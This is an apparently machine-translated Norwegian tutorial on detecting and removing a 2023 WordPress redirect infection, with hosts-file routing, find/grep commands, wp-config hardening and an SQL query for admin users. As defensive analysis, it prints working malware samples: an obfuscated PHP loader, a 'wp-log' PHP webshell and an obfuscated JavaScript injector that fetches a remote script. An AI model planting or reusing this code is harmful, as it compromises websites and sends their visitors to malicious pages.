Fix Redirect WordPress Hack 2023 (Virus Redirect)

WordPress det er definitivt den mest brukte plattformen CMS (Content Management System) for både blogger og nettbutikker for nybegynnere (med modulen WooCommerce), som gjør den mest målrettet av dataangrep (hacking). En av de mest brukte hackingoperasjonene tar sikte på å omdirigere det kompromitterte nettstedet til andre nettsider. Redirect WordPress Hack 2023 er en relativt ny skadelig programvare som har effekten av å omdirigere hele nettstedet til nettsøppelsider, eller som igjen kan infisere brukernes datamaskiner.

Hvis nettstedet ditt utviklet seg på WordPress blir omdirigert til et annet nettsted, så er det mest sannsynlig offeret for det allerede berømte omdirigeringshakket.

I denne opplæringen finner du nødvendig informasjon og nyttige tips for å de-viruse et nettsted infisert med en omdirigering WordPress Hack (Virus Redirect). Gjennom kommentarene kan du få ytterligere informasjon eller be om hjelp.

Innhold

Påvisning av viruset som omdirigerer nettstedene WordPress

En plutselig og uberettiget nedgang i nettstedtrafikken, en nedgang i antall bestillinger (når det gjelder nettbutikker) eller i annonseinntekter er de første tegnene på at noe er galt. Oppdager "Redirect WordPress Hack 2023” (Virusviderekobling) kan også gjøres “visuelt” når du åpner nettsiden og du blir omdirigert til en annen nettside.

Av erfaring er det meste av skadelig programvare på nett kompatible med nettlesere: Chrome, Firefox, Edge, Opera. Hvis du er datamaskinbruker Mac, disse virusene er egentlig ikke synlige i nettleseren Safari. Sikkerhetssystem fra Safari blokker stille disse skadelige skriptene.

Hva du skal gjøre hvis du har et nettsted infisert med Redirect WordPress Hack

Jeg håper det første trinnet er å ikke få panikk eller slette nettstedet. Selv infiserte eller virusfiler bør ikke slettes med det første. De inneholder verdifull informasjon som kan hjelpe deg å forstå hvor sikkerhetsbruddet er og hva som påvirket viruset. Modus operandi.

Lukk nettstedet for publikum.

Hvordan lukker du et virusnettsted for besøkende? Det enkleste er å bruke DNS-manageren og slette IP-en for "A" (domenenavnet) eller definere en ikke-eksisterende IP. Dermed vil besøkende på nettstedet være beskyttet mot dette redirect WordPress hack som kan føre dem til virus- eller SPAM-nettsider.

Hvis du bruker CloudFlare som DNS-administrator logger du på kontoen og sletter DNS-postene "A" for domenenavnet. Dermed vil domenet som er berørt av viruset forbli uten IP, og ikke lenger kunne nås fra Internett.

Du kopierer IP-en til nettsiden og "ruter" den slik at bare du får tilgang til den. Fra datamaskinen din.

Hvordan endre den virkelige IP-en til et nettsted på datamaskiner Windows?

Metoden brukes ofte til å blokkere tilgang til visse nettsteder ved å redigere "hosts"-filen.

1. Du åpner Notepad eller annen tekstredigerer (med rettigheter administrator) og rediger filen "hosts". Det ligger i:

C:\Windows\System32\drivers\etc\hosts

2. I "hosts"-filen legger du til "rute" til den virkelige IP-en til nettstedet ditt. IP slettet ovenfor fra DNS-manager.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Lagre filen og gå til nettsiden i nettleseren.

Hvis nettsiden ikke åpnes og du ikke har gjort noe galt i «hosts»-filen, er det mest sannsynlig en DNS-cache.

For å tømme DNS-bufferen på et operativsystem Windows, åpen Command Prompt, hvor du kjører kommandoen:

ipconfig /flushdns

Hvordan endre den virkelige IP-en til et nettsted på datamaskiner Mac / MacBok?

For databrukere Mac det er noe enklere å endre den virkelige IP-en til et nettsted.

1. Åpne verktøyet Terminal.

2. Kjør kommandolinje (krever systempassord for å kjøre):

sudo nano /etc/hosts

3. Samme som for datamaskiner Windows, legg til den virkelige IP-en til domenet.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Lagre endringene. Ctrl+X (y).

Etter at du har "rutet", er du den eneste personen som kan få tilgang til den infiserte nettsiden med Redirect WordPress Hack.

Full sikkerhetskopiering av nettside – Filer og database

Selv om den er infisert med "redirect WordPress hack”, er anbefalingen å ta en generell sikkerhetskopi av hele nettstedet. Filer og database. Eventuelt kan du også lagre en lokal kopi av begge filene fra public / public_html samt databasen.

Identifikasjon av infiserte filer og de som er endret av Redirect WordPress Hack 2023

De viktigste målfilene til WordPress det er index.php (i roten), header.php, index.php SI footer.php av temaet WordPress eiendeler. Sjekk disse filene manuelt og identifiser ondsinnet kode eller et skadelig skript.

I 2023 ble et virus av "Redirect WordPress Hack"sett inn index.php en kode av skjemaet:

(Jeg anbefaler ikke å kjøre disse kodene!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Dekodet, dette ondsinnet skript det er i utgangspunktet konsekvensen av at nettstedet er infisert WordPress. Det er ikke skriptet bak skadevare, det er skriptet som gjør det mulig å omdirigere den infiserte nettsiden. Hvis vi dekoder skriptet ovenfor, får vi:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

For å identifisere alle filene på serveren som inneholder denne koden, er det greit å ha tilgang SSH til serveren for å kjøre filkontroll og administrasjonskommandolinjer på Linux.

Relatert: Hvordan finne ut om bloggen din er infisert eller ikke, med hjelp Google Search . (WordPress Virus)

Nedenfor er to kommandoer som definitivt er nyttige for å identifisere nylig modifiserte filer og filer som inneholder en bestemt kode (streng).

Hvordan ser du på Linux PHP-filer endret i løpet av de siste 24 timene eller en annen tidsramme?

Rekkefølge "find” er veldig enkel å bruke og tillater tilpasning for å angi tidsperioden, banen til søk og typen filer.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

I utdataene vil du motta informasjon om datoen og klokkeslettet filen ble endret, skrive/lese/utføre tillatelser (chmod) og hvilken gruppe/bruker den tilhører.

Hvis du vil sjekke flere dager siden, endre verdien "-mtime -1" eller bruk "-mmin -360” i minutter (6 timer).

Hvordan søke etter en kode (streng) i PHP, Java-filer?

"Finn"-kommandolinjen som lar deg raskt finne alle PHP- eller Java-filer som inneholder en bestemt kode, er som følger:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Kommandoen vil søke og vise filene .php SI .js inneholder "uJjBRODYsU".

Ved hjelp av de to kommandoene ovenfor vil du enkelt finne ut hvilke filer som nylig er blitt endret og hvilke som inneholder skadevarekode.

Fjerner ondsinnet kode fra modifiserte filer uten å kompromittere riktig kode. I mitt scenario ble skadelig programvare plassert før åpning <head>.

Når du utfører den første "finn"-kommandoen, er det meget mulig å oppdage nye filer på serveren som ikke er dine WordPress heller ikke satt der av deg. Filer som tilhører virustypen Redirect WordPress Hack.

I scenariet jeg undersøkte, filer av skjemaet "wp-log-nOXdgD.php". Dette er "spawn"-filer som også inneholder skadevarekode som brukes av viruset for omdirigering.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Formålet med filer av typen "wp-log-*” er å spre omdirigeringshackviruset til andre nettsteder som ligger på serveren. Det er en malware-kode av typen "webshell" sammensatt av en grunnleggende seksjon (hvor noen krypterte variabler er definert) og o utførelsesseksjonen der angriperen prøver å laste og kjøre en ondsinnet kode på systemet.

Hvis det er en variabel POST kalt 'bh' og dens krypterte verdi MD5 er lik "8f1f964a4b4d8d1ac3f0386693d28d03", så vises skriptet for å skrive det krypterte innholdet base64 av en annen variabel kalt 'b3' i en midlertidig fil og prøver deretter å inkludere denne midlertidige filen.

Hvis det er en variabel POST eller GET kalt 'tick', vil skriptet svare med verdien MD5 av strengen"885".

For å identifisere alle filene på serveren som inneholder denne koden, velg en streng som er vanlig, og kjør kommandoen "find” (lik den ovenfor). Slett alle filer som inneholder denne skadevarekoden.

Sikkerhetsfeil utnyttet av Redirect WordPress Hack

Mest sannsynlig kommer dette omdirigeringsviruset via utnyttelse av administrasjonsbrukeren WordPress eller ved å identifisere en sårbar plugin som gjør det mulig å legge til brukere med privilegier på administrator.

For de fleste nettsteder bygget på plattformen WordPress det er mulig redigering av tema- eller plugin-filerfra administrasjonsgrensesnittet (Dashboard). Dermed kan en ondsinnet person legge til malware-kode til temafilene for å generere skriptene vist ovenfor.

Et eksempel på slik skadevarekode er dette:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript identifisert i temaoverskriften WordPress, umiddelbart etter åpning av etiketten <head>.

Det er ganske vanskelig å tyde dette JavaScript, men det er åpenbart at det spør etter en annen nettadresse fra hvor det mest sannsynlig henter andre skript for å lage filene "wp-log-*" som jeg snakket om ovenfor.

Finn og slett denne koden fra alle filer PHP berørt.

Så vidt jeg kunne se, var denne koden lagt til manuelt av en ny bruker med administrative rettigheter.

Så for å forhindre tillegg av skadelig programvare fra dashbordet, er det best å deaktivere alternativet for å redigere WordPress Temaer / plugins fra dashbordet.

Rediger filen wp-config.php og legg til linjene:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Etter å ha gjort denne endringen, ingen bruker WordPress du vil ikke lenger kunne redigere filer fra dashbordet.

Sjekk brukere med rolle av Administrator

Nedenfor er en SQL-spørring du kan bruke til å søke etter brukere med rollen som administrator i plattformen WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Denne spørringen vil returnere alle brukerne i tabellen wp_users hvem tildelt rollen som administrator. Spørringen gjøres også for tabellen wp_usermeta å søke i meta 'wp_capabilities', som inneholder informasjon om brukerroller.

En annen metode er å identifisere dem fra: Dashboard → Users → All Users → Administrator. Imidlertid er det praksis som gjør at en bruker kan skjules i Dashboard-panelet. Så den beste måten å se brukere påAdministrator"I WordPress er SQL-kommandoen ovenfor.

I mitt tilfelle identifiserte jeg brukeren i databasen med navnet "wp-import-user". Ganske suggestivt.

Herfra kan du også se dato og klokkeslett for brukeren WordPress ble laget. Bruker-IDen er også veldig viktig fordi den søker i serverloggene. På denne måten kan du se all aktiviteten til denne brukeren.

Slett brukere med rollen som administrator som du ikke vet da endre passord til alle administrative brukere. Redaktør, forfatter, Administrator.

Endre passordet til SQL-databasebrukeren av det berørte nettstedet.

Etter å ha tatt disse trinnene, kan nettstedet startes på nytt for alle brukere.

Husk imidlertid at det jeg presenterte ovenfor er et av kanskje tusenvis av scenarier der et nettsted er infisert med Redirect WordPress Hack i 2023.

Hvis nettstedet ditt har blitt infisert og du trenger hjelp eller hvis du har spørsmål, er kommentarfeltet åpen.